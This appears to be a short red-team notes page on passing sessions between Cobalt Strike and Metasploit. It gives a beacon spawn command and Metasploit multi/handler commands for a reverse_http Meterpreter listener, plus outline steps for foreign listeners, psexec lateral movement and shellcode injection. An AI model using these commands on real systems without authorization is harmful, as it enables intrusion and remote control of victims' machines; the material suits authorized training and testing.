githubEdit

Session Passing

Session Passing

CASE 1: Beacon Passing (Within Cobalt Strike - Create alternate HTTP beacon while keeping DNS as lifeline)

beacon> spawn x64 http

CASE 2: Foreign Listener (From CS to Metasploit - Staged Payload - only x86 payloads)

Setup Metasploit listener

attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > run

Setup a Foreign Listener in cobalt strike with above IP & port details

Use Jump psexec to execute the beacon payload and pass the session

CASE 3: Shellcode Injection (From CS to Metasploit - Stageless Payload)

Setup up metasploit

Generate binary

Inject msf shellcode into process memory

Last updated